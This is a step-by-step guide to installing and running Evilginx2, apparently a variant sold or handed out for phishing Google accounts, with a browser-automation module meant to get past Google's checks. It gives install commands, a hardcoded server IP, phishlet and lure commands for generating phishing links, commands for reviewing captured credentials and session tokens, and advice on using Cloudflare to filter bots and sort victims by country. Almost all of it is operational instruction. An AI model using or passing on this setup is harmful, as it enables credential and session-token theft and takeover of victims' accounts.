Installation Steps

Installing and configuring the environment for Evilginx

Update Package Lists

Begin by updating your system's package lists to ensure you have the latest information on the newest versions of packages and their dependencies.

sudo apt-get update

Install xrandr

xrandr is a utility for managing screen resolutions and display settings.

-- Use this option if you want to run Playwright with Xserver (for example, in MobaXterm) so you can view the browser live.
-- If you use "Headless: playwright.Bool(true),", you do not need to install this.

sudo apt-get install x11-xserver-utils

Install Google Chrome

-- Use Chrome only if you choose not to use the browsers included in the Playwright app. In the source you received, you don't need these installations.

Download and install the latest stable version of Google Chrome.

wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome-stable_current_amd64.deb
sudo apt-get install -f # Install any missing dependencies

Install Go Programming Language

-- You will need to install Go: the source code is written in Go, and compiling it on Linux requires Go to be installed.

Go is essential for running Playwright-Go.

wget https://golang.org/dl/go1.20.7.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.20.7.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
go version

Install Playwright-Go and Dependencies

-- You need to install the Playwright Go library, as the Evilginx version for Google uses a module called EvilPlaywright. This module controls a real browser behind the reverse proxy to obtain certain tokens that otherwise cannot be retrieved correctly due to the different host in the reverse proxy or due to Google detecting browser incompatibilities with video versions, fonts, etc.

Set up Playwright-Go, which is required for browser automation.

go get -u github.com/playwright-community/playwright-go
go run github.com/playwright-community/playwright-go/cmd/playwright@latest install --with-deps
go install github.com/playwright-community/playwright-go/cmd/playwright@latest
playwright install --with-deps

Starting Evilginx

To launch Evilginx2, execute the following command:

sudo /root/evilginx2/build/evilginx -p /root/evilginx2/phishlets -developer

  • sudo: Runs the command with superuser (root) privileges, which are often necessary for network-related applications or services.

  • /root/evilginx2/build/evilginx: The path to the compiled Evilginx2 binary. Evilginx2 is a tool often used in phishing simulations or security testing to capture authentication tokens in real time by acting as a reverse proxy.

  • -p /root/evilginx2/phishlets: Specifies the path where the phishlets are located. Phishlets are configuration files that define the behavior of Evilginx2 for specific websites or services (e.g., Google, Facebook). These phishlets contain rules for forwarding requests and capturing tokens and cookies.

  • -developer: Enables developer mode. In this mode Evilginx does not use its own automatic SSL from Let's Encrypt; instead, it uses the SSL settings provided by Cloudflare.

Adding a New Domain and Creating Lures

Configure Your Domain:

  • config domain your-domain.com

Set Your Server's IPv4 Address:

  • config ipv4 103.114.163.58

Create and Enable a Phishlet:

  • phishlets hostname google your-domain.com

  • phishlets enable google

Create a New Lure:

  • lures create google

Retrieve the Lure URL:

  • lures get-url # Retrieves the current lure's URL

Advanced Configuration

Note: All of these commands are run inside the application, meaning they should be entered after the application has started and in the same window. Do not try the commands if you are not inside Evilginx.

Configuration Commands

Manage and customize your Evilginx2 settings using the config command.

  • Display All Configuration Variables: config

  • Set Base Domain: config domain Example: config domain evilsite.com

  • Set External IPv4 Address: config ipv4 <ipv4_address> Example: config ipv4 103.114.163.58

  • Set Binding IPv4 Address: config ipv4 bind <ipv4_address>

  • Change Unauthorized Redirect URL: config unauth_url

Phishlets Management

Phishlets are templates used to create phishing scenarios. Manage them with the phishlets command.

  • Status of All Phishlets: phishlets

  • View Details of a Specific Phishlet: phishlets

  • Create a New Phishlet: phishlets create <child_name> <key1=value1> <key2=value2>

  • Delete a Phishlet: phishlets delete

  • Set Hostname for a Phishlet: phishlets hostname Example: phishlets hostname google evilsite.com

  • Override Unauthorized URL for a Phishlet: phishlets unauth_url

  • Enable a Phishlet: phishlets enable

  • Disable a Phishlet: phishlets disable

  • Hide a Phishlet: phishlets hide

  • Unhide a Phishlet: phishlets unhide

  • Generate Hosts File Entries for Testing: phishlets get-hosts

Lures Management

Lures are specific phishing links created from phishlets. Manage them using the lures command.

  • All Created Lures: lures

  • View Details of a Specific Lure: lures

  • Create a New Lure: lures create

  • Delete a Specific Lure: lures delete

  • Delete All Lures: lures delete all

  • Generate a Phishing URL for a Lure: lures get-url <key1=value1> <key2=value2>

  • Generate Multiple Phishing URLs with Parameters: lures get-url import <params_file> export <urls_file> <text|csv|json>

  • Edit Lure Hostname: lures edit hostname

  • Edit Lure Path: lures edit path

  • Set HTML Redirector Directory for a Lure: lures edit redirector

  • Set User-Agent Filter for a Lure: lures edit ua_filter

  • Set Redirect URL After Successful Authorization: lures edit redirect_url <redirect_url>

Sessions Management

Manage captured credentials and authentication tokens using the sessions command.

-- In other words, here you can see the logs you've captured, as well as the traffic. The empty entries are just accesses.

  • History of All Logged Visits and Captured Credentials: sessions

  • View Details of a Specific Session: sessions

  • Delete a Specific Session: sessions delete

  • Delete Multiple Sessions: sessions delete <id_range> Example: sessions delete 1-7,10-12,15-25

  • Delete All Sessions: sessions delete all

Proxy Configuration

Configure a proxy to route connections to remote websites using the proxy command.

  • All Proxy Configuration Variables: proxy

  • Enable Proxy: proxy enable

  • Disable Proxy: proxy disable

  • Set Proxy Type (Options: http, https, socks5, socks5h): proxy type Example: proxy type socks5

  • Set Proxy Address: proxy address

  • Set Proxy Port: proxy port

  • Set Proxy Username (for Authentication): proxy username

  • Set Proxy Password (for Authentication): proxy password

Blacklist Configuration

Manage IP address blacklisting based on request types using the blacklist command.

  • Current Blacklisting Mode: blacklist

  • Blacklist All IP Addresses for Every Request: blacklist all

  • Blacklist IP Addresses Only for Unauthorized Requests: blacklist unauth

  • Blacklist IP Addresses Without Adding to the Blacklist: blacklist noadd

  • Disable Blacklisting (Allow All Requests): blacklist off

  • Enable or Disable Logging for Blacklist Messages: blacklist log <on|off> Example: blacklist log on

  • Set up a Cloudflare account to filter bots and sort traffic by country.
